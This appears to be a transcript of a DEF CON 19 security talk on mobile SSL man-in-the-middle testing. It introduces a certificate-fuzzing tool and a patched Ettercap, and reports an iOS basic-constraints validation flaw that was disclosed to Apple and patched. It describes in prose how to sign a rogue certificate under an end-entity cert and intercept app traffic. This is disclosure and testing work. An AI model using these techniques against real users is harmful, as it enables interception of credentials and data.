 For those of you who don't know, you guys are sitting in the Getting Slizzard talk. So just brief agenda here where we're going to take you through during this talk, go through some introductions about who we are, go through a little bit of a primer on SSL, talk about some mobile SSL user experiences, research motivations, research implications, talk a little bit about a test lab that we built, I'm going to introduce a tool for you guys so that the Slizzard tool will show you some of the results of us testing some of the mobile apps and mobile devices and then there's going to be an audience participation. So real quick who we are, I'm Nicholas Prococo, I'm the head of the spider labs team at Trust Wave. I started my InfoSec career in the 90s doing penetration testing. This is my sixth DEFCON talk, I actually had two others this weekend, one was Mail or Freak Show on Friday and then the Droid talk yesterday. I'm also the primary author of Trust Wave's Global Security Report. And I'm Paul Kerr, I'm the lead SSL developer and the CA architect for Trust Wave and since I don't have a whole lot of other bio information I can put up here so we decided to say also a mobile game developer in my spare time and also sometimes at work if you're going to hosting con in the next few days we're releasing a game there so if we figure we'd hype it now at Win the App Store this morning, I promise it's not malicious. So before we start we have some audience participation at the end of this presentation and so you're going to be able to help us find a mobile SSL flaw. So what you'll need, so if you have a mobile device, actually you could have any type of device that has internet connectivity, 3G, 4G, if you're on the DEFCON network you can help us out. You have to have the ability to enter a URL in your mobile browser and then you also have to trust that we're not going to be doing anything malicious to you. And then willingness to stand up if your test is successful. So just to gauge the audience, how many people here are willing to help out? Okay, great, cool, that's going to be fun. So let's jump into the introductions here. So what does this talk about? So basically when we were talking about Paul and I were discussing sort of planning for this talk and planning for the research, really we're discussing sort of the evolution of the security experience in mobile platforms. You know, obviously when you have a large giant screen, 27 inch screen in front of you, there's a lot of things you can do from a security standpoint or even security warnings, messages and other things that you could present to users. But when you cram it down into a small little device, the space is limited. And also the developers of the platforms tend to try to abstract some of the busy information that you may see on your desktop platforms or you want to see on your desktop platforms from your device itself. We're also going to talk a little bit about, you know, some different types of SSL attacks. The lack of testing tools, testing available for mobile applications, specifically for mobile app developers. We're also going to talk about how various apps and devices perform under SSL stress. And so we did take some popular apps, ran them through some tests and we're going to present, you know, how those actually reacted. And then we're going to release a tool to help solve this problem. So very, very briefly, just, you know, whenever I give talks I always want to make sure to start with a primer. Because about 11 years ago I sat in the audience at DEF CON and saw plenty of talks and sometimes when I was staring at the presenter I was thinking, I don't have no idea what this guy's talking about. So I wanted to just, you know, bring everybody up to speed. You know, there could be some people in the audience who maybe aren't familiar with SSL. So basically SSL stands for Secure Socket Layer. It uses certificates, digital files, which are certificates defined by the X509 specification. It was actually developed by Netscape back in 1994 and was implemented in Netscape Navigator 1.0. My personal history, I remember when Netscape Navigator 1.0 was released, I was sitting in my dorm room and the day it was released, actually I think it was probably a couple of hours after it was released, I went to a Netscape store and actually bought a t-shirt with a credit card. It was my first experience with SSL and sending a secure transmission across the internet using that technology. It's a protocol, you know, typically used to secure client-to-server communication, data specifically. Most of you in this room interact with it every single day. If you do anything online, logging into sites, if you're using mobile devices and you're logging into your online banking account, whatever you may be doing. Most people have interaction with it. Some people may not be aware they're interacting with it. And then it uses, from a keen standpoint, a key standpoint, it uses asymmetric keys, basically public and private keys, to establish a symmetric key to establish the secure transmission. So we're at SSL, we're at SSLU, specifically SIRTS. We talked about the established secure client-to-server communication. It also is used to establish identity as well. So when you visit a website, a popular financial institution, you often will see sometimes even something like an extended validation indication, like the green bar, that'll establish that you are in fact, or you are in fact connecting to that website that you think you're going to. Also used in app signing, so the same technology used to sign applications, specifically in the mobile world as well. And then log file integrity, lots of times you can actually sign, there are tools out there that will sign your logs to ensure the integrity of those logs they haven't been tampered with after the fact. And then very similar in the mobile world, used for communication or public networks. It's actually pretty important for secure communication or public networks, because we're all roaming around, walking around at conferences, walking down the street, using our phones from untrusted networks such as coffee shops and places like that. And when you submit data that you don't want anybody else to see, you want to send it over the public internet or even public local networks in an encrypted format. So it establishes app-to-server communication. It's also used in app code signing, like we already talked about. And then it's also used in mobile device profiles. So if you work for a corporate, you work for a company and they push down profiles to your iOS device, they'll actually sign those using SSL. So a little bit of a sort of cartoon drawing about what man in the middle is, and this is where we're just going to dive a little deeper into our talk, basically want to describe what is a man in the middle attack. And so you can see that diagram at the bottom, very cartoon-like. But the bad guys sitting in the middle there, the diagram, the U or the end user is sitting over on the left-hand side of the screen, and that's your mobile device, he's injected into your network somewhere. So maybe on your local WAN, it could be somewhere in the path between you and the place you want to visit, the legitimate place you want to go. And so basically you establish your connection with the attacker, and the attacker then establishes a legitimate connection to the back-end server. So when that happens, the attacker is able to then intercept the data that you're sending, but also possibly modify that as well. So what tools actually exist to help with man in the middle attacks? There are quite a few. We've got Thicknet, which is a man in the middle framework developed by Steve Assepic, who's a member of the TrustWave SpiderLabs team. It's written in Perl and is a modular system that allows you to add extra functionality after you've set up your initial man in the middle. There's Edercap, which is the gold standard tool that everybody's familiar with, although it hasn't been developed in quite some time. It's still a very solid and very useful tool for doing this sort of thing. You can also use more basic tools like ARP Spoof that will just spoof ARP, exactly what it sounds like, to cause packets to be redirected to you, and then you can use other tools to intercept and modify those packets. Specifically, things such as SSL Stripper, SSL Sniff. And then there's also things like man in the middle proxy, which is just an SSL capable and intercepting HTTP proxy. So why is true SSL man in the middle difficult? Well, SSL certificates have what's called a chain of trust. The X509 spec was based around the concept that you have roots, or sometimes they're called trust anchors. Those roots are present in the certificate store of the device or application that you're attempting to use. So for example, you connect to facebook.com using your web browser. Your web browser is now chaining. It obtains the SSL certificate and any intermediate certificates in the initial handshake. And then it uses its own internal methods to try and find a chain of trust up to a root CA that it's already familiar with. So you can't just go and sign your own certificate because it's not in there. And if you add it to your own, it's not in anybody else's. And the reason for that is, of course, that, well, we don't want you to be able to create www.facebook.com or api.facebook.com or any of those other certificates because why should you be the authoritative source for that? Now there are certain other ways of trying to develop more distributed networks of trust. But for the moment, X509 is based upon the concept that there are trust anchors. So now that we've established that you need a public CA for that, you now need to find some way to attack a public CA. Now as proven in the past by Moxie and others, you can attack public CA's. However, it's typically not particularly practical. You need to take, you need to focus on one specific one. You may need to spend quite a bit of time and you may not be successful in the first place. Social engineering usually plays a fairly large component in it rather than technical flaw. So then you may want to generate malformed certs. Well, the tooling around generating certificates is pretty streamlined these days. And because the ASN1 spec, which is what X509 utilizes, is so complex, they actually lock it down pretty heavily in almost all the tooling. It's so easy to go wrong. So you actually have to go down and play down in the lib SSL, open SSL layers, or use something like the Ruby open SSL bindings to be able to generate malformed ASN1 structures. So that's usually an obstacle for people who aren't familiar with that type of code. And then SSL parsing zero days are difficult to come by. As Moxie's demonstration of null character attacks worked, he managed to find both a flaw in the way CAs were validating certificates and a parsing error in the actual multiple different parsing engines because that flaw actually affected Firefox and the IES channel validation routines. So we'll talk a little bit about mobile SSL experience from a user perspective. So obviously there's no standard UI. If you have an Android device, you have an iOS device or WebOS, whatever you have, there's no real standard for letting the end user know that they've established a secure connection. So you've established an SSL connection. Most applications show nothing at all. Fire up your online banking app and you just have to assume that maybe it's being sent over SSL, but it could be being sent in the clear. You have no, there's no indication from an end user's experience of the difference. In most cases, like I said, there's no UI at all. There's no lock that you see in a browser experience. It's just basically non-existent. There are things like that in some of the mobile browsers themselves, but just because you see a lock there, you have no ability to drill down deeper to actually check out the certificates that are being presented to you. And then of course there's cryptic warnings. In part of our research, we were doing some of the testing. We noticed a lot of cryptic warnings. Some warnings just didn't even make sense for what was going on in the testing. And then users don't know the difference. So everybody in this room, being security aware, would know the difference, but most end users wouldn't and they wouldn't know if they established a connection or if they didn't. They wouldn't even know to look. And then the pop-up could be lying. So there's the photo you see there, the screenshot you see there was from an app that I actually went and downloaded. It's an app to find sort of boutique hotels when you travel around that are cheaper, but maybe a little nicer than chains. And so when I was using that app, I noticed there was a lock in the corner and it says secured by and it has trust click on it. I mean, you put your finger on that lock and a pop-up box comes up that says secure broken powered by travel click protected by 256 bit SSL encryption. So that could be just complete bullshit. You have no idea if that pop-up is lying. So the browser community has now spent almost two decades tweaking their UI behavior when it comes to SSL. I mean, originally you had locks, padlocks in the corners and you've had padlocks move up next to the URL bar. You've had yellow, you've had green, you've had just white. You've had green locks that actually don't represent EV security. The point is that there is always presentation, even if that presentation has been changing. So there's ways for you to both look at and validate what you're seeing. However, the mobile device market in essence destroyed that in less than five years. It went from at least something to see to you need to trust that something good is happening. When you open up your mobile app to connect to Google Plus or Facebook or whatever your social network is, you just assume that it's using SSL. You have no way to tell. So that's obviously something of a problem and you can't expect to see you, excuse me. So if SSL fails silently on that front, well, the world probably doesn't end, but maybe your personal world does. So some of the research motivations as well, most apps completely ignore the UI aspect of security. So that's something we wanted to look into, like Paul already mentioned, but from the end user standpoint or even from a developer standpoint, you're a mobile app developer. There is a zero functionality difference between sending data in the clear and sending data encrypted. So there's no real motivation other than the protection of the data that's being sent for them to implement it. And so as an end user, you just have to trust that when you're sending some things like credentials or bank account information or credit card information via an app that the developer cares enough about you to actually establish a SSL session and encrypt your data. And we also thought there wasn't really any tools, an easy set of tools for people to run their apps through these types of tests. And then also, when you find OS level problems, they cascade to all apps, or they can cascade to all apps. So if there's an OS level SSL parsing problem, it could affect every single app on a device, not just the ones that are used, not just one single app. And to be fair, that is true of desktop as well, but on the mobile side, much more so than the desktop side, people tend to use consistent APIs that go down to the OS hooks. So for example, on the desktop, you could have several different libraries that are actually handling your SSL validation routines. If you're using Firefox, it uses its own, an SS specifically. And if you're using Safari or Chrome or Internet Explorer or whatever, then you're using S channel or the OS level libraries for OS 10. However, on the mobile side, you're emphatically, unless you've chosen to go a route that very few do, you're using the OS level libraries for handling that. So whenever you're doing security research, there's always the implications of your research. And obviously, something that we talk about today could be used by someone to do something, used to do bad things tomorrow. And basically, due to attackers really focusing on the mobile app world and the mobile device world, obviously the results of our research can be used for, like I said, to do bad things. Specifically, if there's problems with SSL, they can be used for credential stealing, data interception, even response manipulation back to the client application. But the other thing to think about is these types of attacks will go unnoticed. Specifically, if there's a lack of user awareness, users aren't aware, even when they see error messages, if they just click through them, that's a problem as well. And then of course, the lack of UI queues within the apps compound that. So like what we talked about earlier, if the SSL fails and it fails silently, the users are just basically blindly submitting their data through the networks and being intercepted by attackers. So how do you actually build a test lab then? Well, there's a lot of ways, obviously, but one of the simplest and cheapest ways is just go ahead and get yourself a cheap, so ho switch or switch and router like a WRT54GL or something and that typically you'd like it to be able to run a third party firmware like Tomato or DDWRT. You wanna want an attacker system. In our case, we wanna have them use Linux because it's much easier to compile at our cap there than anywhere else. And we went ahead and also added a patch to it that we'll be discussing in a little bit. And then you need some victim clients. In our case, we have a Nexus S that was running at the time, the latest version of Gingerbread and an iPod Touch fourth generation which was running iOS 433. So what types of search do you need then? Once you've got that all set up, you're gonna want ones that are valid for the target domain, of course, so you can validate that it works in the primary use case. You're also gonna want as many malformed SSL certificate types as you can come up with. Self sign which is a common one that many people deal with. CRLF which is a carriage return line feed. That's actually something that in the past various libraries have had trouble with. You feed a carriage return line feed inside the domain or wrapping domains and sometimes it will parse before or after the CRLF. Sometimes it'll just break and return true. Now that hasn't always been, it shouldn't be true now but that doesn't mean it isn't. Then the null prefix which of course was one of Moxie's big ones recently which we discussed earlier. Invalid ASN1 structures where you can write fuzzers where you can say I want to have various broken loops and misnested forms inside my ASN1 structures. And then broken encodings in general where you can push UTF-8 into BMP strings and things of that because ASN1 has type identifiers so you can play around with that. And then things like the basic constraints and key usage and extended key issues extensions. Every certificate has things encoded in it that tell the browser or the OS what it should allow that cert to do. For instance, when you are using a regular server certificate it has an extended key usage called server auth and when you're using it for client authentication it has one called client auth and server auth certs can't be used for client auth and vice versa. And in the basic constraints extension there's typically a field that says CA colon false which means it's not a CA, don't let anybody sign things. So then you need a method of course to generate the above easily. So what we went ahead and did was wrote a Ruby script called Slyzzard that's an open source toolkit to easily generate multiple types of invalid certs for any given domain. The output can then be used with Ettercap to run these attacks against your apps or others to see if these things are vulnerable. We've successfully tested with Ettercap and we have a patch on the DEF CON 19 DVD that you can apply against any standard Ettercap 073NG tree which will allow you to add a new flag, again documented in the patch but you pass dash x that allows you to pass any certificate in. Normally Ettercap generates standard self sign certificates on the fly and since we want to be able to provide different forms of broken certificates we need you use the flag to supply them. There's also a thick net module being developed by Steve Osepic. I believe that will be delayed a little bit but. Yeah Steve's doing a talk I think the next hour called Blinky Lights and so when that talk got accepted it delayed his men in the middle or his thick net module a little bit but he's gonna put that out shortly after our talk. And this setup can be used against any OS application, browser, anything. I mean as long as it's connected to the network that you've developed you can man in the middle of it. So to use it all you have to do is run it. You can either specify it on the command line or it will have an interactive shell for specifying as well. And I guess we can do the demo. Yeah. And the real motivation here was to develop this toolkit so that app developers, specifically app developers that may be using their own libraries to their own routines to validate SSL in their applications. And this will be a surprisingly short demo since it does exactly what you'd expect. You specify the domain you want it to generate certificates for and they are generated. So now we can say let's take a look at one. Let's go ahead and look at the null character attack one. So as you can see it generated for domain.com with a null character. OpenSSL is actually capable of detecting and reparsing null characters such that you can see it. But in certain other tools you may not see the null character because it's a null character and unprintable. But that's the kind of thing we're going ahead and generating and then you have a single key that corresponds to all these certificates. And in the header cap, once you apply the patch you actually can specify the certs to use for your test. As you can see there, so you'll go ahead and execute it, generate your certs, set up header cap using the dash x flag to specify the cert type you want to test. And then you'll use your app as normal and see if you get error messages. If you don't get errors, then you should check header cap which you can tell it, you can either have it outputting data to screen or you can have it writing to a pcap file for later analysis using something like Wireshark. And that'll let you see if the data was intercepted as you expected. You'll have to execute header cap once per cert type generated by Slyzzard to comprehensively test it. We don't allow dynamic switching at the moment although we've been looking into improving the patch. So now we're going to talk a little bit about the mobile app test results. So like we mentioned earlier about setting up the test lab, we actually set up the test lab, we had the various devices and then we proceeded to basically man in the middle, each of those devices and some popular apps. And so, you know, you want. Sure, so on Android as you can see, in a lot of ways we didn't find a whole lot. We ran through several hundred tests actually across the ASN1 fuzzers and various other ones. And you can see that the self sign, CRLF, null character and ASN1s all fail closed. In the browser you get what you'd expect which is the invalid certificate notification which in Android you can also actually click the view certificate and see a little bit of the details. You can't see why the chain might not be working but you can see the end entity certificate itself. Some of the more interesting things around it were that when you do these types of attacks, some of the underlying OS libraries are getting upset because the Facebook app will, for example, completely stop responding. Quitting it, reopening it, doesn't seem to help. You actually have to reboot the entire phone sometimes. However, and then there's the other thing we'll get was confusing error messages. None of them said bad SSL certificate. They would say things like no network connection or server busy, basically fall back error messages that just assumed that there couldn't be a problem with the SSL cert, it was something else. So that was a little bit of an interesting revelation for us. So we also tested iOS in basically the same exact fashion. And so we get the big takeaway here, you can see the same keys. If you can't really see it from the back of the room on the key basically, the green FC means it failed closed. It did what it should. UR means user request. So basically something popped up and asked the user to do something and it failed open. So obviously this was a little bit disappointing at this stage in the research that we didn't find anything. But there was also some confusing error messages as well that we noted. And then one thing to note, Twitter, the Twitter client actually had very nice accurate error messages. I think of all those apps that we tested was the only one that actually accurately displayed what the issue was that was being presented to the end user. So now we're gonna crowd, you have a question? Oh yeah, sorry, yeah, so that's interesting. Thanks for pointing that out. Yeah, so basically once you, when you went to the sign up screen using the Facebook app, we noticed that all data was being transmitted over HTTP. Yeah, it takes you to a custom web view which just loads the m.facebook.com page which is not over SSL. And everything including the sign up form posts over HTTP for some reason. Yeah, it does that whether or not you're man in the middle. That was just a little side thing we found. So now we're gonna do the audience participation. So what are we gonna need to do? We're gonna test for a specific SSL flaw by audience members. So we need as many people as possible to test this. So hopefully we'll find some vulnerable devices out there. You're gonna be showing a URL on the next slide. If you see a certificate error, and when you visit that, don't do anything. We don't need to know that you got that error. But if you see a spider labs logo and we'll show you what that looks like, we like you to stand up. So what we're not going to do, we're not pushing anything malicious to your device. So yeah, I guess you have to trust us with that. And we're not exploiting any known or unknown browser flaws. So this is an SSL negotiation test. That's specifically what it is. And in fact, we don't actually even have any JavaScript on that page, it's pure CSS and HTML. So a little bit about what we're gonna test. So basically if you take the way back machine, you jump in the time machine, go back to 2002, Moxie actually published a serious Microsoft Internet Explorer vulnerability that was basically related to SSL validation checking. Yeah, I mean this flaw happens when a client fails to validate the signers of valid CA. It allows a SSL negotiation to occur incomplete because from its perspective, it found a chain. So chains are actually again unrelated to whether or not the cert is allowed to be a signing CA. That's all in the basic constraints parameter. So if something fails to check that it should or should not be capable of signing and it's just assumed to be capable of signing, that you could sign a certificate underneath your own personal website for some other website and then just pass that as an intermediate and it will validate. So that was what Moxie found at the time. Yeah, so we take us to the present day. If we have a device or we found a device during our research that this was successful, it's basically complete SSL failure. So basically SSL man in the mill, completely possible, whether it's a device or an app is operating on a public network. So today at DEF CON 19, we're gonna go through and actually see if this exists on any mobile platforms in the audience. So do you wanna explain what we did to set this up? So what we did is we requested a cert from a public CA for a meaningless domain and specifically in this case, we used a cert that I personally have for my own blog. Then we used that certificate in S Lizard to generate and sign a new certificate in private key just underneath it. So basically we treated that end entity certificate as a sub CA. And then we installed the resulting certificate and key on test server and passed the meaningless domain cert as the intermediate. So the correct vertebrae when visiting this test server is a certificate error. It just shouldn't work. So let's do the test. So everybody in the room, if you can visit ssltest.spiderlabs.com and then if you see this logo on your screen without having to click through anything, please stand up and you wanna do it as well with the audience. Sure, so I'll go ahead and just take a look at it myself here. Oh, sorry about that guys. Sorry, it is ssltest.spiderlabs.com. So if you see the logo, please stand up. Okay, so you wanna do it as well to show what the audience looks like. Sure, if everybody's got it here. Keep standing. So this is what you should see if you are vulnerable to this attack. You should not see a security warning at all. Yeah, if you see a security warning that means your phone is not vulnerable to this attack. It's not working at all? You get the error on the blackboard. Yeah, that's good. Which you should. Okay, let's go back into the... Sure. We'll explain a little more here. So it's sort of the problem here, so. So thanks everybody. I guess you can sit back down. Wait, actually one question? While you're standing up. Does anybody not using an iOS device? Who did get man in the middle? We have someone back there. Okay, if you can see us after the talk. We'd love to talk to you. Yeah, so actually, yeah. So what is your device, sir? That runs iOS. Thank you though. We have one here. Oh. Interesting. Yeah, if you could see us after the talk, that would be great. There's a Samsung rogue, he said. Yeah. That is an Android device. Yeah, so let's, well. If you could see us after the talk, we'd be interested to talk to you. So basically, anybody using anything less than iOS 4.3.5, so if people are aware, Apple just pushed out a patch about a week ago, a little bit, nine days ago, that specifically addressed this issue. Yeah, and it's just for those of you who might be on Verizon, it's 4.2.10 is the patch version that fixes it. And this patch was solely pushed out to fix only this bug. There were no other fixes out there because of the severity of the issue. Yeah, from the timeframe, you know, Apple did a great job. It was 10 days after we reported this problem to Apple that they actually patched and pushed out the newest release. So what we show here in the results here, so the basic constraints test, browser, Facebook, Mint, Foursquare, and Twitter all failed open. And so what that means is that we were able to establish complete man in the middle via SSL and intercept all the traffic that was being sent from the client device to the server. And then a little side note here, we estimate the iOS users' exposure. So the people who stood up are still exposed and are still vulnerable to this attack, basically it was about 18 months. Everything sends at least 3.1.3. And since Apple tends to end of life after about two years, each iPhone, they're no longer eligible for updates security otherwise. 3.1.3 was the last version for the original iPhone. 4.1 something was the last version available for the iPhone 3G, so only 3GS and iPhone 4 are actually eligible to not be vulnerable. So I guess to note to the people who are standing in this room, all of you, whether you're on the DEF CON network or you're anywhere else, could be man in the middle via this method and we probably recommend at this point you put your phone in airplane mode. The Apple patch fixes the underlying library, so it fixes it for browser and apps and everything else. So after our iOS disclosure, Moxie was pretty tickled about the fact that one of his bugs had come back around. And so he released an updated version of SSL SNF that will fingerprint and do this to any device that you've got on your network. Eric Monti, one of our TrustWave spider labs guys, has developed a workaround for iOS developers who want their app to work on earlier versions and not rely on iOS to the validation checking. We're gonna be posting a blog post about that right after the talks for people who want to incorporate this code snippet. We'd love more eyeballs on it because quite frankly, we're not sure why it works, but it does seem to. The one big implication there, so say you are a financial institution and you have online banking customers who are using a banking app from an iOS device. If those customers are not patched, that means that all the customers in your ecosystem that are not using this latest version are now vulnerable. So iOS developers may want to implement this, or specifically that banking application developer may want to implement this to fix it retroactively in older devices. Right. And then just recently, Hubert or Hubert or whatever his name might be, he's solely by this alias, released a tool called iSNF, which also does SSL man in the middle using iOS less than 435. So you can check that out on GitHub as well. So conclude, I guess just to conclude here, the basic takeaway is that we need more eyes on this type of technology, on this testing. So that's why we put together this toolkit for developers to be able to test their apps, test their devices and to find these problems and fix them. But I guess from a user perspective, we all have to insist that SSL is used for all data transmission. But then we also need to also insist that the mobile device manufacturers, the mobile platform developers, fix their UI. So it's more recognizable to us and other end users at what's going on from a secure data transmission standpoint. Apps and devices that should always fail close when there's an SSL problem. So in that regard, our testing has revealed that in general they try to do that, that's a big improvement over the past years. And that's an encouraging note, I guess, but it results in a larger dependence on a single failure point, which hopefully people will continue to consistently test to make sure it doesn't have problems that have occurred in the past. And I guess the one final piece, the gentleman that actually had that Samsung device, if you can meet us here, when we were doing this talk, we knew that the iOS devices would be vulnerable because we released that advisory with Apple and we were hoping that we might find another device. Obviously in our test lab, we didn't have hundreds of flavors of devices to play with and the gentleman with the Samsung device, if you can meet us, we wanna find a little more details about that device and it may have, you may see an advisory come out very soon on that platform as well. So that's our talk. Thanks everybody. Thank you. Thank you.